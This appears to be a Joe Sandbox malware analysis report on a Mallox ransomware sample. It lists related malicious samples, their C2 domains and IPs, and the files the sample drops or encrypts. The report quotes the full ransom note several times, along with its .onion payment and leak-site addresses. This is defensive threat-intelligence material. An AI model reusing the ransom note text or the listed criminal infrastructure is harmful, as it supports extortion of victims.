                        Behavior and APIs

                        TimeTypeDescription
                        06:41:00API Interceptor6x Sleep call for process: malware.exe modified
                        11:41:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FILE RECOVERY.txt

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        13.248.169.48DHL_734825510.exeGet hashmaliciousFormBookBrowse
                        • www.egyshare.xyz/440l/
                        purchase order.exeGet hashmaliciousFormBookBrowse
                        • www.aktmarket.xyz/wb7v/
                        SRT68.exeGet hashmaliciousFormBookBrowse
                        • www.avalanchefi.xyz/vxa5/
                        ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                        • www.remedies.pro/4azw/
                        Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.optimismbank.xyz/98j3/?2O=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&ChhG6=J-xs
                        Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                        • www.smartgov.shop/1cwp/
                        SW_5724.exeGet hashmaliciousFormBookBrowse
                        • www.egyshare.xyz/440l/
                        attached invoice.exeGet hashmaliciousFormBookBrowse
                        • www.aktmarket.xyz/wb7v/
                        YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                        • www.tals.xyz/k1td/
                        Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                        • www.optimismbank.xyz/98j3/
                        172.67.74.152Simple1.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        Simple2.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        systemConfigChecker.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                        • api.ipify.org/
                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                        • api.ipify.org/
                        y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                        • api.ipify.org/

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        whyers.io1.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • 172.67.191.103
                        Imdouqb.batGet hashmaliciousUnknownBrowse
                        • 104.21.76.77
                        mallox.bin.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • 104.21.76.77
                        CnsRlvK7Ho.exeGet hashmaliciousTargeted RansomwareBrowse
                        • 172.67.191.103
                        aKiefGOIEn.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • 104.21.76.77
                        M74aRxVX4H.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • 104.21.76.77
                        XZerken3Py.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                        • 172.67.191.103
                        PIB42H30FM.exeGet hashmaliciousNeshta, Targeted RansomwareBrowse
                        • 104.21.76.77
                        dCiZg2JJEr.exeGet hashmaliciousTargeted RansomwareBrowse
                        • 104.21.76.77
                        mTCDNn2yjZ.exeGet hashmaliciousTargeted RansomwareBrowse
                        • 172.67.191.103
                        api.ipify.orgOverdue_payment.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 172.67.74.152
                        TECHNICAL SPECIFICATIONS.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        Shipping Documents 72908672134.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205
                        980001672 PPR for 30887217.scr.exeGet hashmaliciousAgentTeslaBrowse
                        • 172.67.74.152
                        y1rS62yprs.exeGet hashmaliciousBabadedaBrowse
                        • 104.26.13.205
                        apilibx64.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                        • 104.26.12.205
                        xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                        • 104.26.12.205
                        BiXS3FRoLe.exeGet hashmaliciousTrojanRansomBrowse
                        • 104.26.13.205
                        lEUy79aLAW.exeGet hashmaliciousTrojanRansomBrowse
                        • 104.26.13.205
                        GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                        • 104.26.12.205

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AMAZON-02USjmhgeojeri.elfGet hashmaliciousUnknownBrowse
                        • 99.77.190.195
                        i686.elfGet hashmaliciousUnknownBrowse
                        • 34.214.142.97
                        jmggnxeedy.elfGet hashmaliciousUnknownBrowse
                        • 108.140.170.78
                        pjyhwsdgkl.elfGet hashmaliciousUnknownBrowse
                        • 3.166.144.252
                        i586.elfGet hashmaliciousUnknownBrowse
                        • 3.99.213.175
                        arm5.elfGet hashmaliciousUnknownBrowse
                        • 52.58.164.45
                        jmhgeojeri.elfGet hashmaliciousUnknownBrowse
                        • 3.110.117.56
                        mips.elfGet hashmaliciousUnknownBrowse
                        • 52.18.252.214
                        akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                        • 13.60.8.87
                        xobftuootu.elfGet hashmaliciousUnknownBrowse
                        • 100.21.154.148
                        CLOUDFLARENETUSjmggnxeedy.elfGet hashmaliciousUnknownBrowse
                        • 104.25.181.119
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 172.67.165.166
                        akcqrfutuo.elfGet hashmaliciousUnknownBrowse
                        • 172.71.100.65
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 172.67.165.166
                        pbnpvwfhco.elfGet hashmaliciousUnknownBrowse
                        • 104.25.44.215
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 172.67.165.166
                        BanK_copy.rtfGet hashmaliciousUnknownBrowse
                        • 188.114.96.6
                        BL-100410364195.exeGet hashmaliciousMassLogger RATBrowse
                        • 172.67.177.134
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.16.9
                        file.exeGet hashmaliciousLummaC StealerBrowse
                        • 104.21.16.9

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        37f463bf4616ecd445d4a1937da06e19INQUIRY REQUEST AND PRICES_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                        • 13.248.169.48
                        Bank Swift and SOA PRN00720031415453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                        • 13.248.169.48
                        RFQ Order list #2667747.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                        • 13.248.169.48
                        Payment Details Ref#577767.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                        • 13.248.169.48
                        IBAN Payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                        • 13.248.169.48
                        AdminAccounts.aspx.dllGet hashmaliciousMatanbuchusBrowse
                        • 13.248.169.48
                        AdminAccounts.aspx.dllGet hashmaliciousMatanbuchusBrowse
                        • 13.248.169.48
                        Doc_21-04-53.jsGet hashmaliciousMatanbuchusBrowse
                        • 13.248.169.48
                        klog.php.msiGet hashmaliciousMatanbuchusBrowse
                        • 13.248.169.48
                        Doc_21-04-53.jsGet hashmaliciousMatanbuchusBrowse
                        • 13.248.169.48

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\$Recycle.Bin\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1000\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1001\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\$WinREAgent\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Documents and Settings\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.malox (copy)

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):32876
                        Entropy (8bit):7.994122308958193
                        Encrypted:true
                        SSDEEP:768:ttXX4IlMyga1LmsN4jSIk/yTE7k7eclOihLIgIXLiEp:ttXnlRBmsiSI0yAKlOgNQ5p
                        MD5:27DED726B32EDBFF39574324CC76C01C
                        SHA1:82605CE414756EB21B778665924DDA56D7E6611B
                        SHA-256:DA55D262A1580F9AFAAC7AAAC804C377AC16C6144A37FD798445EFBFE7B8C5C7
                        SHA-512:5CD42F048A45C775DB5153EFEC12893567ADB68C5E942216DB5F4F5EEF1CAD9B43C04B525DC541A6532F94EBE8276719BB274C84045ABC4F0CC7494996FE8903
                        Malicious:true
                        Preview:',.....^.k..e...\...x..?.!.2....Cq6J.Y|...V......f<\?.W.j.........U.MY.|'..u..>.3&44s...T{..*.A.."...t.2.i.Ln....V.qk'=....'/.......m.-.>..d..[..T..w.#..t-0...!..h:.._..y.?....z..^(..2 ...._..A...W.>...$..D'~.d.."`A........KA...)...!c.....P.T..)..p....$h.lD.k[z..+...'..3.a.4......C.......6..w,a!2.r<..e....L.K>....w.@.k.K...-Ua..$....>'B..z.....f.....0.<4x.U...~.{....l..H!I.Nc....bX..}.*A.4.3...K..Te.5g..6...).NG...Y.e'..Sk:.d..MA..rz...w.W9B...L.d.W.5..d\....K67..]..u.>.ze..b.w.k*..0t..Z.h..Y....~.\{f..R.1.Wi.A.......I.M....2..+?.F.'...-1..`=...%..%.;x|.9\...&.H.JP..j.|E....3^%:7%:..dZ.L.$v.Y..h./PA2..H..w...ge...&^.*.:.....od...Z...7(.M.c.9,......A"...6.1..\c@..L...X*,.Q..+ ..'..t..`.g.l.(.(.^.(.o..1... iw$..`....h(...e3l..u../.~R.*.UK@..l..zX.&.<..}...s[..D.|...6.=e.P...T.k..*.._...P0_...-SO...&..].N.|.^.jxn.....2....K.....Jn.g@....*v.a@..Z:........u.5...5......e...r.ik...j.+........=Z.c.[u.9.b...;..........4.O.;QG......g._.>..8.

                        C:\Documents and Settings\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.malox (copy)

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1351500
                        Entropy (8bit):3.660781026399493
                        Encrypted:false
                        SSDEEP:3072:V5ILYNLIuWSzxcPolR9FEeI0mGWPMfaL+eGsQ+:OYNLIzSFc9J
                        MD5:1E8D41346AD54FB2CAC07EB59AF4D021
                        SHA1:45C8D14A11900A81E3E2BE9FC4DB473E0ED8D2F1
                        SHA-256:3830529A29A2BC2A93510CF4E127BECD9ADD496712A2CFB7C85062D0201774E9
                        SHA-512:48F04051A99DF823C917E74F824041B9A9EF6632A314DC5C2721AA25CAD40C30668DF0E453600D8DC5098729D5F7BCB7CB2377F9190F931CF0D6E976D00F86B4
                        Malicious:false
                        Preview:....`.=..(...].^..<.v......@.....W..,....fI^b...%~...qUD=...!...]H......2.y..Y.p.Vu.M..[*...8..|.a..y:.e.\....:..h}...[.....K...*..ua.?..q.,.y......l...#{Y."{.p...^..=.Q.OR)[.(....t......B.eE.3..E.g+].[.w;...C.^F.](.v.TTM.*.u..8..8L.)........u.. ..P...C]..J..I.wFD./.A[.... ".H..e.M..0.....jP.....e%`.}.-O .A......1`.....F...... ^..D")ms..G..2y=.!.V.,.L3....2<>.e.....W...y....9..*..?..v.<I....`.%..vJm.eR.#...c..$...rKi...@*p..RG...U.?.B.[.....<.q..H.~.0cs..CK.@].o...Ns..../6..I.....Wz....)...V@...z.......:...P....0]_o.....7.5.<.+...j-.j.....*.xJ.?.w%U..#z..\....;.I.*.YY7.0..^...t.8.lu,..0.....I.L.6..!YN..W.i....._Z;B.o.gW..-..=.<..'...m.c.\.O........E...pN..\C....!.....)iL.g)..4*......}}.7......TR!:.#h.P.vP.UP..l%7SVZ...6..u...H.k...[O."n....O...W&.z....4i..S3`.gJ2Qj...4.}8...0...O.9.6U7t..D9M[.~.......R......d..^.....V..O.".....h..&.+.)......#...q`c.....@..qq..|@..t.....I.,{.@&.^.....5q.y:.t.............qg9[...e...[K.....W@.{.m...Z./.

                        C:\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:true
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Program Files\7-Zip\7-zip.chm

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):115408
                        Entropy (8bit):7.998395468560456
                        Encrypted:true
                        SSDEEP:3072:eYXPGPpuC7i656bVNAs4+Gmqgarh+X4E3m+FYWZjGMoeXI:eYXP1CurQsAgafs1FY06NZ
                        MD5:2B7A939C4E26D23F654FC757914656F2
                        SHA1:03BFFC7E4DD2EAB9CC346F99AF8D2A2999B9DA5F
                        SHA-256:EE4D93734236E61BED1C0870ABF601EE933C0BFF5A7CABA2D3A8C9C78964B830
                        SHA-512:7056B47692D8638361FDE2C5F0F50707BBA06A99700795E0BFBE3F8BD45D6433B705BF1B2C4DB6BF2E3727FFB93757DFA9EA5E24027D7929B019958FEBC63420
                        Malicious:true
                        Preview:...S..R...lC.t.#..Xzx^]..E&.'.d=..[L.>3#A..3.......p8.....].p.....W......f.j1.9..A........aph.;..|....6.A>#..rRMZQ..=......}....F...@. :.,..<n..K...;<.g.3..>&..........0~Im`.X.id].F=y.h..'O...x..<..8..NI....NQ`..c.x..g.(z.~^.H..H..9o..azw...T..e.fLW(K./..N.q.y.V.M.3.{............\.A.?cUo..%R...9.y............X..s]p.D'..|./.?..{a...M.y.O*...$n.l....\e...4R.Vl.......t.0...K0...,.w...-_......-.]#...K....`.k.j.u..>F.l.iu{..1..T|.(..Y.............z.......j...3v.....}.F.=.k.p.b8.Pf.f..E............IMA.9../.....r.tG.[;....{,....\.E.R(........a..Vt..4;.R..m..f.......1.L..+....-.N.;.>a`...;.n.;*..).D..vT..C.q[..r..(.c..u]1.2V.....\..".l....2..ufg.9.s.........7.:h.0.a..W./..<N.`..+..N7..W........#.nsB....2..d..,.A$G...>.a.Urc....'X8.9@.x.-...^.%....?4........2..Y....+el.5...+....b..X.N..uz........2........9nJ{...9'...jY{....K...O#..s...?.7.e....X.V..F9...ffCk2b.o..o....O....e.e....7/*..1.8.i....E..F.N%..w.?.......s 1..y ..}5c...[I[.b..A..V.

                        C:\Program Files\7-Zip\7z.sfx

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):214636
                        Entropy (8bit):7.996637620129664
                        Encrypted:true
                        SSDEEP:3072:J5FynHIe3XbUB+G+qHWiEGu54IRLVuPWY7SjkLclv10bp2gsP9SH7/uFdx:tmIebZG+f1Gu5NxuP3SIL/9sSbO
                        MD5:37836B67E40C0FC3FB11CE6A62840BEF
                        SHA1:C8402F25A1955C342117F1F8517A420913A3B766
                        SHA-256:989D442CE295C3CFEBC443D3A9DEA349722C606557B1673995D6768CD55C9446
                        SHA-512:F4E20585F7B8B9BC2C388CC7084D5E2DEB247F1E4A33F888D1DD2080C599F7A12E17CFD62D0E101581A244293E2CE1A95EE39E8B9F1354F773B12DD9C12456C8
                        Malicious:true
                        Preview:.={(2....'.6j..@W......{3.p...!x .....c?...\.......h.......`...#.2..e.A;yL..l.....GO..{......R...X........a.W.[.6 .Km.....0r.u.U..6;...s.5UX<l.T.4..a].G.Q..>.."^.)..`%..}9..xU./....+V..m....S-..}.&.K..0gg..D..%t`.c.......c*$.(...Nr.-..XH8.*3Q....uA.h..2&}.{[.=.@.#.\V'....L>.....%..6.#u.Z./..+?.XjV.^.0.I..T...YY.....'.T...y....z8.........n.2.5XM..$.y..v.:Q.h./.3H..Fo2-h >.T5R...B...z.k.,...{...../Ox..b>.W..Pc.~.P..*w/].;..I'.....Av...F.....^......c..V...P#em.E.s~O\.[.7......}*......&.g...C9..(..~0o...UW.s.g.....i.d..u... ..=....U....j7(....e/*{.&...PA.}.tW..=..p.....8..`N.c..N.6....FY<.>&....j..b..5..c.u........O..4(.....1.......Y^k./...V....N(J.....Q...XK.1..x4.h.\...xC...:.{.....Y....pN)..W....)....&....+Bd....-.U....k...U.ii..{..>@\..Fo..bn.#.K.~.4.(....y`F.a.<.9:...S,0.[..x.:.Z....'P.K..0.[y.5.:..=...... .4.......\.......P.......R....n.....c......DQA..e...^.D.....+.........m..6.....".-.ah=.c]..d_{.,..e96.].X.&|..F.M>....&.9.'...N...o.<.gg.

                        C:\Program Files\7-Zip\7zCon.sfx

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):193132
                        Entropy (8bit):7.997779320183811
                        Encrypted:true
                        SSDEEP:3072:LuwQFAX5d5mYB8GpwL8dmP57Sht6/e1gkngbAgv1yofckm:LeS5zmY9w2mPE6/eGH3v/tm
                        MD5:C964C18D63DE789D4440FF1221D1543E
                        SHA1:C9FE00C829B066C5767B5720EB4D304658DDA275
                        SHA-256:07EC885626892A34790D5AE6C60E1F1038EC070C9BF2DB194213281CA85870CF
                        SHA-512:87AA244F636F2A18B6360003960FEBB2CC053E9B771462267B1E3028146C5E1BBA13598125FF08277C9EFDE62B779C4E7A9CF3E271446A4DF780ED8B519F96D4
                        Malicious:true
                        Preview:._.J$|._#.KSO.|....6....Z..rzR..#...;j..........Z...#1h.9.....$6....V........9.u.6.uC.>.>..(....eD.....[.&..).D..).t[1.....qk..!.`-(..J.=.Y92+..6...|..~.0;.....h.>j.._..\.n-.......L.'..7.Sk1.......D...>n.;F...qU++[.W_?yX.>|s......kE....I..rE|......F.Q.=s..b?..{8..&..s.+...Z..\;......Y...]j..#.H.Z07F...\....4.w....xN"..u..?..m..`...b.Q.a.l../iK..@.%n..J..k...>..vM...Y..N3.0..b..w.y.:....b.IF.??.....`..-...g.S.c.j...z*v.zg.5...r..r.\.&...7.....M....-....S..I...u.E..4....f.x.Y.;...r9..L8Q.Fo(H..........j.|.j..;jsr...E..Yt....A..N......[-{-......f1zP3...<....`..T[....v..X..i....HJ......k.]M..&..Wm.......R.....ph...H..8.nT.f.R/.pw.....vuq..h...e.z.R...^.(/Tz.....<1..;.t.J..;.@...../&kA.yS.tx.H-A.._.?..........%d.4s..b........BH.... N.6.c.....a..H..Bp../...M.Bk..........Vn..^.E.7......;...K.,...dOkR..1<.s,s...c..o|....p.`.]l.E..k.n.. p..6.!.B.yO..Pi.~....S.H...2..ee....Uc...%.....$.%.%ZS.{....U.M........`?....Y$...K.O.rc...*..ae....a.}s........=.rs5

                        C:\Program Files\7-Zip\History.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):58413
                        Entropy (8bit):7.997171544955562
                        Encrypted:true
                        SSDEEP:1536:VZW6zR/sh7cHJhnRARyjP/AMlXrtOJekvB+jwQzBE5HgAwcBL5l:rmhwRARa/TtoZ+MQza5HVwCj
                        MD5:D0596315510C1BC37A6171F75BACA575
                        SHA1:B3C63C3426B30BDC952E1621D5E2F6FBFDAB0305
                        SHA-256:BF7A95D4F9A9C64EE28561203375252583C49D3F5343C62962A3027BCCF3BEA9
                        SHA-512:DBDFBC8FB3FA64F2A41746F327BDD81F16FDC23047B2DD3ABA08B5ECBF06865ACAC6651E2012A41807A6FA55470D12882184C2C5DCF385DDF34F0934846F418D
                        Malicious:true
